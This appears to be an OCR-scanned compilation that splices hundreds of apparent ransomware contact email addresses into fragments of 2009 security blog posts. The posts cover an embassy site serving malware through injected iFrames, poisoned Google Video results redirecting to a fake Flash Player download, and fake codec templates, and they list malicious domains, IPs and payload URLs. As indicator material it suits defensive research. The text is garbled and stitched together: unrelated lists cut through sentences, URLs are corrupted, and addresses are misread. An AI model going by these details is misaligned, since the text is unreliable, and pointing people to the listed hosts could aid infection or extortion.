greenreed007@qq.com 
irisaneby@aol.com 


joshua _antony@aol.com 
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makop.support@secmail.pro 
makop@keemail.me 
makopfiles@aol.com 
MikeyMaus77@protomail.com 
modeturbo@aol.com 
mrdjohni@tutanota.com 
myfilesdecrypt@cock.li 
steaknshake@gmx.us 
viginare@aol.com 
ww6666@protonmail.com 
agares helpdesk@tutanota.com 
agares@airmail.cc 
Yamer2@protonmail.com 
vassago0213@airmail.cc 
vassago 0213@tutanota.com 
admindevon@cock.li 
ryuk1l@cock.li 
decryptinfo@msgsafe.io 
decrypt1info@airmail.cc 
Paybackformistake@qq.com 
code666@msgden.com 
elit.code@protonmail.com 
filel@keemail.me 
filel1@protonmail.com 
filelm@yandex.com 
fileln@yandex.com 
filel@techie.com 
genobot01@gmail.com 
fasfry2323@naver.com 

satan _pro@mail.ru 
Rabbit2002@pm.me 
Foxdecrypt@protonmail.com 
xxback@keemail.me 
darkusmbackup@protonmail.com 
fileskey@qq.com 
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them have already been suspended. Let’s dissect the third, and the only currently active one. 
iFrames embedded at the embassy’s site: 

msn-analytics .net/count.php?0=2 

pinoc .org/count.php?0=2 

wsxhost .net/count.php?0=2 


wsxhost .net/count.php?0=2 (202.73.57.6) redirects to 202.73.57.6 /mito/?t=2 and then 
to 202.73.57.6 /mito/?h=2e where the binary is served, [2]a compete analysis of which 
has already been published. The rest of the malicious domains - registered to palfrey- 
crossvw@gmail.com - parked at [3]mito’s IP appear to have been participating in iFrame 
Campaigns since August, 2008 : 


google-analyze .cn 
yahoo-analytics .net 
google-analyze .org 
qwehost .com 
zxchost .com 
odile-marco .com 
edcomparison .com 
fuadrenal .com 
rx-white .com 


As always, the embassy is iFramed "in between" the rest of the remotely injectable sites 
part of their campaigns. 


Related assessments of embassies serving malware: 
[4]Embassy of Brazil in India Compromised 

[5]The Dutch Embassy in Moscow Serving Malware 
[6]U.S Consulate in St. Petersburg Serving Malware 
[7]Syrian Embassy in London Serving Malware 
[8]French Embassy in Libya Serving Malware 


1. http://blog.ismaelvalenzuela.com/2009/01/26/embassy-of-india-in-spain-found-serving-remote-malware- throug 


-iframe-attack/ 


ttp://mad.internetpol.fr/archives/3-Etude-de-cas-Infection-rootkit-TDSS.htm 


. http: //whois.domaintools.com/202.73.57.6 


ttp://ddanchev. blogspot .com/2008/11/embassy-of-brazil-in-india-compromised.htm 


. http: //ddanchev.blogspot .com/2008/01/dutch-embassy- in-moscow-serving-malware.htm 
. http: //ddanchev.blogspot .com/2007/09/us- consulate-st-petersburg- serving. htm 
. http://ddanchev. blogspot .com/2007/09/syrian-embassy-in-london-serving.htm 


ttp://ddanchev.blogspot.com/2007/12/have-your-malware-in-timely-fashion.html 


5.1.11 Poisoned Search Queries at Google Video Serving Malware (2009-01-28 17:04) 
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fileskey@cock.li 
support@fbamasters.com 
unlockforyou@india.com 
frenkmoddy@tuta.io 
paymeme@cock.li 
paymeme@india.com 
decryptsupport@airmail.cc 
supportlocker@firemail.cc 
lola2017@tuta.io 


BM-2cVeAHvZZjUf8M1v7AZKWeopqcYnTVFVZG@bitmessage.ch 


alexgen@cock.|i 
alexgen@tuta.io 
help@wizrac.com 
anonimus852@tutanota.com 
anonimus852@cock.|i 
asgard201@cock.li 
asgard2018@cock.li 
decrfile@protonmail.com 
file.wtf@protonmail.com 
hersgory@india.com 
auditt@cock. li 
ataprof@cock.li 
wolksvagen@protonmail.com 
dataprof@cock.li 
rapidadmins@nigge.rs 
fastsupport@cock.li 
patapuck@india.com 
sofrdecrypt@firemail.cc 
maxspeed@tutamail.com 
lub@wizrac.com 
returnthefile@cock.li 
sheldonleecooper@india.com 
secure-it@tuta.io 
mariode@cock.li 


softdecrypt@firemail.cc 
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maxspeed-dcr@tutamail.com 
andersoncrypt@firemail.cc 
belinda@cock.|i 
rapid@helprapid.org 
BM-GtovgYdgs7qXPkoYaRgrLFuFKz1SFpsw@bitmessage.ch 
gillette help@mail.com 
gillette-help@mail.com 
gagima@gmail.com 
helperso@protonmail.com 
heperso@cock.li 
rapid@aaathats3as.com 
rpd@keemail.me 
pay4decryptl@cock.li 
pay4decryptl1@protonmail.com 
rapidka@cock.li 
mavxfashghgr@mailchuck.com 
youfile@protonmail.com 
grupposupp@protonmail.ch 
grupposupp@airmail.cc 
pay4dec@cock.lu 

p4d@tuta.io 

notnepo@cock.I|u 
burcr@protonmail.com 
burcr@airmail.cc 
mail@rapidO.com 
snhmgmczxapj@mailchuck.com 
recovery.company@protonmail.com 
rapid.file@tuta.io 
mail@rapid2019.com 
gufito@tutanota.com 
DiskDoctor@protonmail.com 
arvato@atomsilo.com 
cristalia@atomsilo.com 
unibovwood1984@protonmail.com 


ormechal9@tutanota.com 
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jannelle2021@protonmail.com 
janelle2021@protonmail.com 
maykolin1234@aol.com 
fugal39gh@dr.com 
serverrecovery@mail.ru 
admin-amnesia@protonmail.com 
admin-amnesia@bigmir.net 
mikoyan.ironsight@outlook.com 
thecrackerOday@gmail.com 
thecrackerOday@gmail.com 
geekhax@amail.com 
RiptoursOL@gmail.com 
decrypter.files@gmx.com 
decrypter.files@gmx.com 
trevinomasonl@mail.com 


salvatoreolsond598d@gmail.com 


trevincmason|l@torbox3uiot6wchz.onion 


trevinomasonl@mail.com 


trevinomason1@torbox3uiot6wchz.onion 


rsa2048pro@unseen.is 


morghoolius-valaar@protonmail.com 


gennadiybukin@tutanota.com 
pavlikmorozov@india.com 
rememberggg@tutanota.com 
helpcrypt@airmail.cc 
supphelp@cock.li 
dongeswas@tutanota.com 
dongeswas@cock.li 
aidcompany@tutanota.com 
davidfreemon2@aol.com 
recoveryfiles@techmail.info 
steriok@mail2tor.com 
proper12132@tutanota.com 
amba@thesecure.biz 


amba@exploit.im 
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GoNNaCrypt@protonmail.com 
bugbugo@protonmail.com 
X.cryp.0.R@gmail.com 
ss-eu@pm.me 
support-ssp@pm.me 
support-eus@pm.me 
support-mapo@pm.me 
support.mbox@pm.me 
sivo.support@pm.me 
DUBOIS-dws@pm.me 
mbit.support@pm.me 
support-gomer@pm.me 
cert@cert.pl 

sobachka _thaabah@india.com 
gerasiy.kerasinov@yandex.com 
hoster@420blaze.it 
dablio@tuta.io 

helpdesk _mz@aol.com 
mzrdecryptorbuy@firemail.cc 
montserrat501@protonmail.com 
montserrat501@airmail.cc 
dataissafe@protonmail.com 
dataissafe@mail.com 
foxbit@tutanota.com 
relaxmate@protonmail.com 
crocodelux@mail.ru 
savecopy@cock.li 
bazooka@cock.|i 
funtik@tutamail.com 
proff-mariarti@protonmail.com 
decryption@mail.ru 
king.ouroboros@protonmail.com 
king.ouroboros@tutanota.de 
junglesec@anonymousspeech.com 


junglesec@secmail.pro 
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BM-2cTAPjtTkqiW2twtykGm5mtocFAz7g5FZc@bitmessage.ch 
xX _mister@india.com 
bivisfiles@protonmail.com 
Zoyel596@msgden.net 

Sin Eater.666@aol.com 
losamedicas@protonmail.com 
minipod@protonmail.com 
boleronez@gmail.com 
khomeyni@yahooweb.co 
khomeyni@tatanota.de 
lilmoonl@criptext.com 
lilmoon0@criptext.com 
cracker.irnencrypt@aol.com 
cracker.irnencrypt@protonmail.com 
octencrypt4444@gmail.com 
movingman3000@gmail.com 
idfgiughderighu@tutanota.com 
Stevensons@tuta.io 
enc2@dr.com 
dsuoufygfdt@ro.ru 
odododo@ro.ru 
support@juicylemon.biz 
provectus@protonmail.com 
_sos@juicylemon.biz 
silentshades@protonmail.com 
AsupQue@protonmail.com 
AsupQue@tutanota.com 
servewintenzz@secmail.pro 
DYAQrvHmy@protonmail.com 
charmant@jabb.im 
backtonormal@tutanota.com 
backtonormal@vistomail.com 
fonix@tuta.io 
fonix@mailfence.com 


ransom12344@protonmail.com 
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Flashkingg@cock.li 
GreenArrow@cock.|i 
Encgod93@gmail.com 
Maschinengewehr@cock.li 
bondbond1@protonmail.com 
SatansSlave@Cock.li 
decryptyourfiles@firemail.cc 
Mr.decryption@protonmail.com 
decoder@firemail.com 
leroy3564@protonmail.com 
donovan4039@airmail.cc 
darryl8227@msgsafe.io 
rickhood@armormail.net 
meredithpatrick@protonmail.com 
jojocrypter@mail.ru 
kangarooencryption@mail.ru 
encryptss77@gmail.com 
svetlanasuvorenko@india.com 
zerocrypt2016@gmail.com 
RedDot@ctemplar.com 
schweeps@ctemplar.com 
krypted@riseup.net 
krepted@riseup.net 
geniesanstravaillee@outlook.fr 
geniesanstravaillee@yahoo.fr 
geniesanstravaillee@gmail.com 
frthnfdsgalknbvfkj@outlook.fr 
frthnfdsgalknbvfkj@yahoo.com 
frthnfdsgalknbvfkj@gmail.com 
hotline@adpresence.net 
booba.karis2542@gmail.com 
heniesanstravaille@outlook.fr 
heniesanstravaille@yahoo.com 
heniesanstravaille@gmail.com 


WarlockdeDieHard4@protonmail.com 
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patrick4452@protonmail.com 
Olivier92747@protonmail.com 
olaggoune235@protonmail.ch 
ouardial11@tutanota.com 
5quish@mail.ru 
veronikstreem@protonmail.com 
dbhjftdg2322345gg@jabb.im 
Wana-XD@bk.ru 
RLOOO@protonmail.ch 
ramsey34.ramsey34@vfemail.net 
d_dukens@aol.com 
d_dukens@bitmessage.ch 


djekr@aol.com 


BM-2cXEvy8D3LFpuLpRq8423Ajb7nJ4NfEPFD@bitmessage.ch 


stnsatan@aol.com 
Satan-Stn@bitmessage.ch 
enigmax _x@aol.com 
jekr@aol.com 

jajanielse@aol.com 
jajanielse@bitmessage.ch 

purely purely2@aol.com 

purely purely2@bitmessage.ch 
dyamol@bitmessage.ch 

storage of decoders@aol.com 
storage of decoders@bitmessage.ch 
dyamol@aol.com 

Jacob 888jk@aol.com 

Jacob 888jk@bitmessage.ch 

big decryptor@aol.com 
Terminator _123@protonmail.com 
resurrection777@protonmail.com 
avastvirusinfo@yandex.ru 
helptodecrypt@list.ru 

jaw@jaw.id 


ransOme@protonmail.com 
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Hermes837@aol.com 
mydataback@cock.li 
datahelper@protonmail.com 
cobain ransom@protonmail.com 
cobainOransom@cock.li 
jenkinsOran@countermail.com 
jenkinsOran@cock.li 
voyager010@aol.com 
voyager@cock.li 
hendrixOhelper@countermail.com 
hendrixOhelper@cock.li 
shawhart1542925@mail.com 
anderssperry6654818@mail.com 
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UPDATE: A recently published article at [1]the Register by John Leyden incorrectly states that 
"[2]researchers at Trend Micro discovered that around 400,000 queries returning malicious 
results that lead to a single redirection point" wherease the researchers in question went 
public with the attack data on the [3]27th of January, and then again on the [4]28th of January. 


This isn’t the first time the Register shows [5]an oudated siatuational awareness, follow- 
ing the [6]two month-old coverage of a proprietary email and personal information harvesting 
tool, [7]which | extensively covered in between receiving comments from one of the affected 
sites. 


A blackhat SEO-ers group that’s been generating bogus link farms ultimately serving malware 
to their visitors during the past couple of months, has [8]recently started poisoning Google 
Video search queries and redirecting the traffic to a fake flash player using the PornTube 
template. ([9]The Template-ization of Malware Serving Sites). Approximately 400,000+ bogus 
video titles have already been crawled by Google Video. 


Instead of sticking to a proven traffic acquisition tactic in the face of adult videos, the 
campaigns are in fact syndicating the titles of legitimate YouTube videos in order to populate 
the search results. What’s also worth pointing out that is that once they start duplicating the 
content - like they’re doing with specific titles - based on their 21 bogus publisher domains, 
they can easily hijack each and every of the first 21 results for a particular video. The fake 
flash player redirection is served only when the visitor is coming from Google Video, if he 
or a researcher isn’t based on a simple http referer check, a legitimate YouTube video is served. 


Upon clicking on the video from any of their publisher domains, the user is 
taken to porncowboys .net/continue.php (94.247.2.34) then forwarded do xfucked 
.org/video.php?genre=babes &id=7375 (94.247.2.34) to have the binary served at trackgame 
-net/download/FlashPlayer.v3.181.exe and qazextra .com/download/FlashPlayer.v3.181.exe. 
[10]Detection rate for the flash player. 
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hotgirlstube.net 
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puresextube. net 


The malware publisher domains crawled by Google Video redirecting to the bogus flash player 


nudistxxx .net - 22,000 bogus video titles 
realsexygirls .net - 21,000 bogus video titles 
trulysexy .net - 27,100 bogus video titles 
madsexygirls .net - 18,900 bogus video titles 
mypornoplace .net - 25,700 bogus video titles 
hotcasinoxxx .net - 28,900 bogus video titles 
hotgirlstube .net - 37,900 bogus video titles 
xgirlplayground .com - 50,600 bogus video titles 
puresextube .net - 20,700 bogus video titles 
xxxtube4u .com - 11,400 bogus video titles 
sexygirlstube .net - 63,100 bogus video titles 
xporntube .org - 12,800 bogus video titles 
xxxgirls .name - 33,500 bogus video titles 
girlyvideos .net - 37,500 bogus video titles 
mytubecentral .net - 38,900 bogus video titles 
puresextube .net - 20,700 bogus video titles 
teencamtube .com - 18,400 bogus video titles 
celebtube .org - 41,100 bogus video titles 
truexx .com - 16,900 bogus video titles 
hottesttube .net - 28,100 bogus video titles 
hotgirlsvids .net - 27,200 bogus video titles 
watch-music-videos .net - 14,900 bogus video titles 
marketvids .net - 29,900 bogus video titles 
gamingvids .net - 7,930 bogus video titles 
hentaixxx .info - 25,500 bogus video titles 


The campaign is currently in a cover-up phrase since [11]discussing it yesterday and no- 
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xtron@fros.cc 

decrypt _arena@india.com 
forestt@protonmail.com 
youneedfiles@india.com 
audit@cock.|i 
garenrayphal989@aol.com 
odasnasri1976@aol.com 
admindecryption@cock.li 
mercarinotitia@qq.com 
bufytufylala@tuta.io 
aidaclark2@aol.com 
aptopfawkvee1975@aol.com 
backfiles2@aol.com 
bolkemafetehia@aol.com 
brolin.tasso@aol.com 
condneparriol976@aol.com 
contreavilil1974@aol.com 
darrellgrant628@aol.com 
decryptdata@qq.com 
decrypter2018@hotmail.com 
decryptprof@qq.com 
diegobtc@tutanota.com 
fairman2@cock.li 
fairman3@cock.li 
filedec@tuta.io 
filerestore@cock.li 
fittanatos@cock.li 
garvinford@aol.com 
helper2k17@india.com 
helperwindows@cock.li 
heslo _1@protonmail.com 
katiabloom@aol.com 
krastycorp@aol.com 


maja _ashby2@aol.com 
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Mmarialz280williams@aol.com 
mazma@india.com 
menhausl@aol.com 
MillardFillmore@cock.li 
mp35@protonmail.com 
peekaboo@qq.com 
pettyealoin@aol.com 
raclawtravier@aol.com 
restorehelp@cock.li 
rigoprill23@cock.li 
robot2018@tutanota.com 
sh2137@email.vccs.edu 
skycry17@qq.com 
sqlbackup40@cock.li 
strongman@cock.li 
youfiles@dd.com 
zula.ryall2@aol.com 
seautylolal976@aol.com 
leberciouded1975@aol.com 
avflantuheems1984@aol.com 
sasutemul1972@aol.com 
manpecamet1974@aol.com 
raxisubsrol1977@aol.com 
skynet45@cock.li 
kores@cock.|i 
HELPFUL@decrypt-files.info 
heriberto lazcano@aol.com 
ovthafejal987@aol.com 
ovro@tuta.io 
Tocktock@qq.com 
polmacpol@cock.li 
data@decoding.biz 
writehere@qq.com 
madbad@foxmail.com 


welesmatron@aol.com 
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welesmatron@cock.|i 
satco@tutanota.com 
skpayment@protonmail.com 
drwho888@mail.fr 
skypayment@protonmail.com 
korvinOamber@cock.li 
blackhat2019@aol.com 
master777@tutanota.com 
crypted files@qq.com 
anticrypt@countermail.com 
unblock@badfail.info 
bfiles2@cock.li 
omfg@420blaze. it 
plombiren@hotmail.com 
adobe-123@tutanota.com 
aq811@tutanova.com 
trupm@protonmail.com 
amber777king@cock.li 
dtrestorehelp@gmail.com 
berserk666@tutanota.com 


sqlbackup2@maail.fr 


data recovery 2019@aol.com 


ms _13@aol.com 
qqwp@tutanota.com 
amber777king@tutanota.com 
altairs35@india.com 
carcinoma24@aol.com 
encrypt11@cock.li 
888superstar@mail.fr 
tartartary@cock.li 
Darksides@tutanota.com 
rubaka@cock.li 
seeyoubro@tutanota.com 
aq811@tutanota.com 
decryptyourdata@qq.com 
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filekey77@tutanota.com 
filekey77@cock.li 
mr.crypt@aol.com 
one.crypt@aol.com 
bitcharity@protonmail.com 
tradebitcoin@email.com 
relax@data-safe.me 
ctatmulfite@protonmail.com 
crypt7@tutanota.com 
cryptlstyle@aol.com 
cryptlstyle@keemail.me 
idecryptyourdata@cock.li 
who8@mail.fr 
decryptdocs@protonmail.com 
decryptdocs@airmail.cc 
datadecrypt@qq.com 
Enigmalcrypt@aol.com 
1btc@decryption. biz 
sysadmin@mail.fr 
bleeparity@protonmail.com 
dr.web24@aol.com 
adolfhackler@tutanota.com 
decripted@cock.li 
beam@firemail.cc 
rocosmon@cock.li 
dalanso@aol.com 
backdata888@mail.fr 
luxsoft@tutanota.com 
chanelcrypt@aol.com 
btcdecoding@qq.com 
vombombom@cock.|i 
WSS911@tutanota.com 
altairs35@protonmail.com 
Altairs35@cock.|i 


datareturn@qq.com 
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dkey999@cock.li 
restdoc@protonmail.com 
supporthelp@mail.fr 
ban.out@foxmail.com 
mr.hacker@tutanota.com 
myOday@aol.com 
daysupp@aol.com 
sprt@keemail.me 
support@cock.|lu 
hccapx@protonmail.com 
ks20296@email.vccs.edu 
bigmacbig@cock.li 
lablabpub@tutanota.com 
MasterLuBu@tutanota.com 
MasterLuBu@tutanota.cock.li 
lablabpub@tutanova.com 
ii05635@aol.com 
seavays@aol.com 
adm15@protonmail.com 
mstr.hacker@protonmail.com 
keeky@protonmail.com 
thebest777@protonmail.ch 
MasterLuBu@cock.li 
mrhacker@cock.li 
support@qbmail.biz 
bitcoinL@foxmail.com 
zanzibar65@maail.fr 
helpsok@cock.|i 
helpsok@tutanota.com 
getbtc@aol.com 
The777@tuta.io 
Harmahelp73@gmx.de 
Harmahelp73@protonmail.com 
usacrypt@aol.com 


uncleme@cock.li 
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unlock@decryption.biz 
1169309366@qq.com 
reservesupport@cock.|i 
mrcrypt@cock.li 
vip76@protonmail.com 
fox5sec@aol.com 
sec5fox@aol.com 
rsal024@tutanota.com 
newebola@aol.com 
keyhelp@cock.li 
ecnrypt98@cock.li 
paybuyday@aol.com 
gillian.cher@aol.com 
recoverysq|@cock.li 

vite. mcclatchie@aol.com 
dewitt.foxcroft@aol.com 
fire show@tuta.io 
fireshow@cock.li 
marjut56@cock.li 
marjut65@tutanota.com 
veerafa@airmail.cc 
jackadams@airmail.cc 
2048rsa@tutanota.com 
catchbtc797@protonmail.com 
nmodes@aol.com 
keyfiles@tutanota.com 
whitwellparke@aol.com 
recoverysql@trotonmail.com 
santacrypt@aol.com 
cryptor6@tutanota.com 
BTC@decoding.biz 
Btcdecoding@foxmail.com 
helips@protonmail.com 
testfilel1@protonmail.com 


Myfilesback@aol.com 
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tifying Google with all the details. But the potential for abuse remains there. Timeliness vs 
comphrenesiveness of a malware campaign? 


Following this example of comprehensivess, take into consideration the timeliness in the 
face of October 2008’s campaign when [12]hot Google Trends keywords were automatically 
syndicated in order to hijack search traffic [13]which was then redirected to several hundred 
automatically registered [14]Windows Live blogs whose high pagerank made it possible for 
the blogs to appear within the first 5 results. 


. http: //www.theregister.co.uk/2009/02/02/google_video_search_poisoned/ 


ttp://blog.trendmicro.com/google-video-searches-being-poisoned 


_hvep:/ologs.2dnet con/security/?p=2455 

http: //ddanchev. blogspot .com/2009/01/poisoned-search-queries-at-google-video.htm 
_netp://adanchev. blogspot. cos/2008/0T /risks-ofoutdated-situational-avareness. ht 
_ cep: / nev. tharegioter co-ux/2006/01 /07/jobetve data, bectharvesting heck] 
_hvtp://ologs net .con/security/?pri085 

age eee 

_hvtp://adanchev. blogspot con/2008/0T /seaplate-izaton-of-aalvare-serving.htall 

10, nexp://wws.virustotal .con/anaTieis/346648928122e34cTOF417bcA516aTe 

12, netp://oLogs. zane con/ security /?p1996 

i ere ocean cretron on te fo /aseaeacieaecoge sana aeyeoesioe a) 
14, http: //wev.ti1efactory.con/tile/4fanta/n/rogue_blogs_google. trends. txt 
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5.2.1 The Template-ization of Malware Serving Sites - Part Two (2009-02-02 15:49) 
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filesback@tutanota.com 
notgoodnews@cock.|i 
new2crypr@aol.com 
2new2crypt@aol.com 
cyberunionn@protonmail.com 
magicswordhero@aol.com 
crown desh@aol.com 
devil98@tutanota.com 
bitdecrypt@cock.li 
harma277@gmx.de 
wang.chang888@tutanota.com 
wang.chang.team.888@protonmail.com 
helpkey@tutamail.com 

mark _white@mail.ua 
MrRdx@cock.li 
MrRDX@protonmail.com 
Cost1BTC@protonmail.com 
onioncrypt@aol.com 
onion@nigge.rs 
o000x1@protonmail.com 
fooox2@cock.li 
Thomaskey@cock.li 
neuromanix@aol.com 
neuromanix@tuta.io 
supermetasploit@cock.li 
Theransom@tutanota.com 
anna _admin@aol.com 

anna _adm1in@protonmail.com 
gangflsbang@cock.li 
dr.decrypt01@aol.com 
hitsbtc@tuta.io 
savebase@420blaze. it 
recoverydata@qbmail.biz 
HarmaENC@Cock.|i 
tcprx@cock.li 
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fun63s@protonmail.com 
abc@countermail.com 
getthefiles@protonmail.com 
getthefiles2@protonmail.ch 
backmydata@protonmail.com 
decrypt24@gytmail.com 
White@gytmail.com 
Qb777@tutanota.com 
hmdjam@protonmail.com 
metasploit@post.com 
metato3sploit@gobv2.eu 
1btc@cock.li 
consolemsf@aol.com 
bluekeep@aol.com 
trizvani@aol.com 
ggg666999@goat.si 
wannacry@msgsafe.io 
payforkey@firemail.cc 
restore data@gmx.de 
unlockodveta@gmail.com 
backdata@qbmail.biz 
eye@onionmail.org 
1337@onionmail.org 
paymei@msgsafe.io 
honestly@tutanota.com 
projectb@onionmail.org 
pcstuntman@onionmail.org 
plganstalp@aol.com 
clean@onionmail.org 
lockfilters@zohomail.eu 
crpt4mn@onionmail.org 
crpt4mn@msgsafe.io 
bitcoil@foxmail.com 
evgalci@gmail.com 
Hollyman137@gmail.com 
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cry 16@hmamail.com 
suppteam03@yandex.ru 
wickedhosting@gmx.com 
aes-ni@protonmail.com 
aes-ni@tuta.io 
0xc030@protonmail.ch 
Oxc030@tuta.io 


aes-ni@sigaint.org 


AES _KEY GEN _ASSIST@protonmail.com 


cmp@keemail.me 
antihacker2017@8ox.ru 
braincrypt@india.com 
headlessbuild@india.com 
grion@protonmail.com 
grions@protonmail.com 
grion@techie.com 
grion@dr.com 
fulldoang@gmail.com 
mgfakhri@gmail.com 
byd@india.com 
xalienx@india.com 

alex _pup@list.ru 
keepcalmpls@india.com 
happydaayz@aol.com 
strongman@india.com 

511 _made@cyber-wizard.com 
email@aol.com 

alcohol walker@aol.com 
alcohol walker@india.com 
bigbig booty@aol.com 
bigbig booty@india.com 
blacksupp@aol.com 

black healer@india.com 
crazyfoot granny@aol.com 


crazyfoot granny@india.com 
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freeman.dor@aol.com 
freeman.dor11@india.com 
gotham _back@aol.com 
gotham _back@india.com 
makgregorways@aol.com 
makgregorways@india.com 
mr _chack@aol.com 
skunkwoman _next@aol.com 
skunkwoman@india.com 
third _work@aol.com 

third3 _work@india.com 

vya _technology@aol.com 
vya _technology33@india.com 
overrldeloop@mail-on.us 
overrldeloop@tuta.io 
BM-2cXpCihgsVxB31uLjALsCzAwt5 xyxr467U@bitmessage.ch 
filesopen@yahoo.com 
openingfill@hotmail.com 
zuzya _next@aol.com 
zuzyacrypt@india.com 
laborotoria@protonmail.ch 
summerteam@tuta.io 
summerteam@india.com 
support24@india.com 
support24 O2@india.com 
asnaeb7@india.com 
asnaeb7@yahoo.com 
Lockyhelper@cyber-wizard.com 
lockyhelper@protonmail.com 
alfatozulu@tutanota.com 
alfatozulu@mail.ru 

Decoder _master@aol.com 
Decoder master@india.com 
file free@protonmail.com 


koreajoin69@tutanota.com 
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Donald _Trump@derpymail.org 
saruman7@india.com 
sarumanl1@india.com 
sarumanl@yahoo.com 
BlackMajor@protonmail.com 
George Bush@derpymail.org 
Bill Clinton@derpymail.org 
youdecrypted@india.com 
steffevendeng@post.com 
fostecrypt@aol.com 
overrideloop@mail-on.us 
overrideloop@tuta.io 

Ronald Reagan@derpymail.org 
omnoomnoomf@aol.com 
plingyfiles@aol.com 
andrey.gorlachev@aol.com 
toolsent@tuta.io 
toolsent@india.com 

lin chaol@aol.com 

lin chaol@india.com 
decoder@expressmail.dk 
Ixgiwyl@india.com 
Ixgiwyl7@yahoo.com 
BM-2cWuBiTDADEdbDBapSwkCin9yDprcbobjp@bitmessage.ch 
true _offensive@aol.com 

true _offensive777@india.com 
proof3200@tutanota.com 
kps228@yandex.com 
staer@cock.li 
kimchenyn@india.com 

sexy _chief@aol.com 

sexy _chiefl8@india.com 
greenpeace _wtf@aol.com 
greenpeace 28@indoa.com 


colin _farel@aol.com 
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lpcrestore@outlook.com 
sbgpork@tuta.io 
sbgpork@india.com 
paradisecity@cock.li 
paradisecityl1@protonmail.com 
helpforyou@airmail.cc 
server5@mailfence.com 
yoshikada@cock.Ilu 
bentleysali@india.com 
brons@airmail.cc 
parbergout@keemail.me 
parbergout@india.com 
BrabusDangers@india.com 
dream _dealer@india.com 
zerwix@airmail.cc 
fileredeemer@protonmail.com 
feleredeemer@tuta.io 
decryptingyourfiles@firemail.cc 
jakartatv@india.com 
decrpt@tuta.io 
decrypthelp@protonmail.com 
crypto.support@india.com 
sexy chiefl1@aol.com 
swon50@inbox.ru 
restor@tuta.io 

sambuka _star@aol.com 
sambuka _star@india.com 
crypto.supportt@aol.com 
aoki@airmail.cc 
allfilereturn@outlook.com 
allfilerereturn@cock.li 
irestorei@cock.|i 
emilysupp@outlook.com 
supp7@india.com 
3170537163@qq.com 
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diesel space@aol.com 
diesel _space@india.com 
bigbig booty@inda.com 
skunk _girl@aol.com 

skunk _girl@india.com 
smarty _bunny@aol.com 
smarty _bunny22@india.com 
encryptedhelp@outlook.com 
encryptedhelp@cock.|i 
assistance@airmail.cc 
aid1@cock.li 
backfiles2018@qq.com 
okumura@firemail.cc 
okumura@tutamail.com 
incredibleOQansha@tuta.io 
incredibleOQansha@cock.|lu 
iwasaki@420blaze.it 
iwasaki@tutanota.de 

reserve player11@india.com 
JanetCurley1986@outlook.com 
janetcurley@cock.li 
ihelperpc@outlook.com 
bizarrio@venom.io 

supp 24 7@outlook.com 
supp247@cock.li 
healforyou@outlook.com 
healforyou@cock.li 

Benjamin Jack2811@aol.com 
satana@keemail.me 
zyxel@cock.li 
happykeys2day@protonmail.com 
happykeys2day@tuta.io 
fileshelp@cock.li 
luedtkis@feudtory.com 


luedtkis@bejants.com 
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reverso@qq.com 
reverso@cock.li 
decryptorxxx@aol.com 
decryptorxxx@india.com 
Fruttellal@cock.li 
Fruttellal@protonmail.com 
Fruttellal@outlook.com 
Midnightt@cock.li 
TonnyMonro@cock.li 
Trampapam@cock.li 
dkcruptmaster@aol.com 
dkcruptmaster@india.com 
coffix@tuta.io 

coffix@india.com 
firstouch@qq.com 
firstouch@cock.li 
wixomd@ymolt.com 
wixomd@pyvenom.com 

Kim _Chen _Yn@protonmail.com 
bathed1212@cock.li 
restorefiles666@cock.li 
restorefiles666@protonmail.com 
cryptopay12@protonmail.com 
cryptopay12@cock.li 
blellockr@godzym.me 
blellockr@inqwari.com 
spysecurelab@airmail.cc 
securehunter@airmail.cc 
decrypt data@aol.com 

decrypt data2@protonmail.com 
cartmelsutton@venom.io 
barddolling@pipestcontrol.com 
mr.Pewterschmidt@protonmail.com 
mr.Pewterschmidt@gmx.com 
frazeketcham@cnidia.com 
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frazeketcham@chadfarrcreations.com 
luboversoval48@outlook.com 
luboversoval48@protonmail.com 
a.wyper@bejants.com 
a.wyper@worldtravelnotebook.com 
Ssv.goro@aol.com 
mr.goro@keemail.me 
gustafkeach@johnpino.com 
gustafkeach@tohaveandtohold.us 
gustafkeach@johnpino.ad 
tanoss@protonmail.ch 
valakas@cock.li 
bestdecoder@protonmail.com 
bestdecoder@cock.li 
Erenahen@cock.li 
Kishemez@tutanova.com 
helper666@cock.li 
helper666@tutanota.com 
Kishemez@tutanota.com 
rescuerr@protonmail.com 
rescuer@cock.li 
mrromber@cock.|i 
mrromber@tutanota.com 
redteamoperation@protonmail.com 
redteamoperation@seznam.cz 
sills@protonmail.ch 
Rockettte@tutanota.com 
Raisin@cock.li 
kingsleygovan@krnas.com 
kingsleygovan@imeetpower.com 
blackcilla@qq.com 
blackcilla@cock.li 
icanhelpyou@tutanota.com 
pristonklav@tutanota.com 
happychoose@cock.li 
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happychoose2@cock.li 
taargo@olszyn.com 
taargo@iran.ir 
taargo@feecca.com 
damerg@wothi.com 
bucsbannyb@aol.com 
bucksbanny@mail.ee 
server2@mailfence.com 
filessupport@cock.li 
monkserenen@tvstar.com 
merlen@keemail.me 
merlens@protonmail.com 
merlen@dr.com 
restore@goat.si 
restore@dr.com 
morf56@meta.ua 
fhmjfjf@default.rs 
asdasd333@default.rs 
jabber-hellobuddy@sj.ms 
hellobuddy@sj.ms 
jabber-winnipyh123@sj.ms 
winnipyh123@sj.ms 
jabber-theone@safetyjabber.com 
theone@safetyjabber.com 
jackpot@jabber.cd 
_bigdick333@jabber.cd 
bigdick333@jabber.cd 
cccrraab@jabber.cd 
krakenk811@gmail.com 
kraken0@india.com 
kraken@innocent.com 
alex.vas@dr.com 
pwwu@ruggedinbox.com 
wambeng.watson@gmail.com 
recoverynow@india.com 
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‘TRY Windows Media Player 


“Now Playing 


Windows Media Player is unable to play movie file. 
Please click here to download new version of codec. 


= 
O\OvOOOO O—0 


The growing use of "visual social engineering" in the form of legitimately looking codecs, 
flash player error screens, adult web sites, and YouTube windows in order to forward the 
infection process to the end use himself, is the direct result of the ongoing [1]template- 
ization of malware serving sites. This standardizing is all about achieving efficiency, in 
this case, coming up with high-quality and legitimately looking templates impersonating the 
average Internet user by enjoying the clean reputation of the impersonated service in question. 


The attached screenshot of very latest DIY windows media player with pretty straightfor- 
ward instructions on how to modify the timing of the "missing codec" pop-up, is a great 
example of how cybercriminals rarely value the intellectual property of their fellow col- 
leagues. The DIY template has in fact been ripped-off from a competing affiliate network 
participant (currently active xxxporn-tube .com/123/2/FFFFFF/3127/TestCodec/Best), its im- 
ages hosted at ImageShack, and the codec released for everyone in the ecosystem to use - 
and so they will. 
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gravityz3r0@sigaint.org 
cryptofag@protonmail.ch 
cryptosweettooth@gmail.com 
r6789986@mail.kz 
